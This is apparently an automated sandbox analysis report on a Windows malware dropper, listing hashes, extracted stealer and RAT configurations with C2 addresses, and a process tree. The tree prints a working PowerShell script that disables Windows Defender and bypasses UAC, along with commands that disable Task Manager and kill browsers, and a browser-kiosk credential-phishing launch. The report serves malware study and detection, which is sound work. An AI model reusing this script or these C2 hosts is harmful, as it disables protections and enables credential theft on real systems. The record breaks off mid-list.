Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 14:21

General

  • Target

    c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe

  • Size

    7.0MB

  • MD5

    a9910f03968585550a8e5e1c5913acb6

  • SHA1

    1f04963fb8947a56ea31c04c5b0869770fde836b

  • SHA256

    c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96

  • SHA512

    42dd69df6dfed2d3d3a9d57bd4034f0e3f9248f2a261670bda61f96547c8c7c0cb4f71b2a4ac68360b0cdf46cd4976a863899c91ab47620160d78f05112f29b0

  • SSDEEP

    196608:kedgAK+4K5xQiVP6sht1JFHRKPsms8cc50IzAAkhD:kYgA7XVP6i13HRiTGc50M4

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
    "C:\Users\Admin\AppData\Local\Temp\c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p4Y09.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L9O32.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1E05b7.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1444
            • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
              "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2848
            • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
              "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                7⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4732
                • C:\Windows\SysWOW64\sc.exe
                  "C:\Windows\system32\sc.exe" qc windefend
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:4892
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4040
                • C:\Windows\SysWOW64\whoami.exe
                  "C:\Windows\system32\whoami.exe" /groups
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1728
                • C:\Windows\SysWOW64\net1.exe
                  "C:\Windows\system32\net1.exe" start TrustedInstaller
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:324
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 2744
                7⤵
                • Program crash
                PID:4980
            • C:\Users\Admin\AppData\Local\Temp\1013724001\1395d34d32.exe
              "C:\Users\Admin\AppData\Local\Temp\1013724001\1395d34d32.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1792
                7⤵
                • Program crash
                PID:6300
            • C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe
              "C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4448
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:4932
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1580
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4144
                  • C:\dllnet\HyperServerFontdll.exe
                    "C:\dllnet/HyperServerFontdll.exe"
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4408
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CxbidAjhUd.bat"
                      10⤵
                        PID:1460
                        • C:\Windows\system32\chcp.com
                          chcp 65001
                          11⤵
                            PID:1144
                          • C:\Windows\system32\PING.EXE
                            ping -n 10 localhost
                            11⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:4272
                          • C:\Users\Admin\Contacts\dllhost.exe
                            "C:\Users\Admin\Contacts\dllhost.exe"
                            11⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5140
                • C:\Users\Admin\AppData\Local\Temp\1013726001\9521c8ff45.exe
                  "C:\Users\Admin\AppData\Local\Temp\1013726001\9521c8ff45.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4700
                • C:\Users\Admin\AppData\Local\Temp\1013727001\51e04a8ac8.exe
                  "C:\Users\Admin\AppData\Local\Temp\1013727001\51e04a8ac8.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:1088
                • C:\Users\Admin\AppData\Local\Temp\1013728001\0d6f1088ef.exe
                  "C:\Users\Admin\AppData\Local\Temp\1013728001\0d6f1088ef.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:3200
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM firefox.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3464
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM chrome.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2560
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM msedge.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4424
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM opera.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4144
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM brave.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3412
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    7⤵
                      PID:4804
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        8⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of SetWindowsHookEx
                        PID:3556
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {378bcf95-d3cc-481e-bdb3-d92b70257f61} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" gpu
                          9⤵
                            PID:2848
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2452 -prefMapHandle 2448 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13f6fdd8-c377-4089-aa01-2d775c56940a} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" socket
                            9⤵
                              PID:4032
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 3000 -prefMapHandle 2892 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {243b78b8-08da-4a7a-b394-5ab710d6c62f} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
                              9⤵
                                PID:4572
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3988 -childID 2 -isForBrowser -prefsHandle 4012 -prefMapHandle 4008 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1328 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e22165a1-91ee-445d-8ff2-843dd1fab527} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" tab
                                9⤵
                                  PID:3360
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4560 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4540 -prefMapHandle 4544 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15826f7-230e-45ed-b718-9de78c74baac} 3556 "\\.\pipe\gecko-crash-server-pipe.3556" utility
                                  9⤵
                                  • Checks processor information in registry
                                  PID:6604
                                • C:\Program Files\Mozilla Firefox\firefox.exe
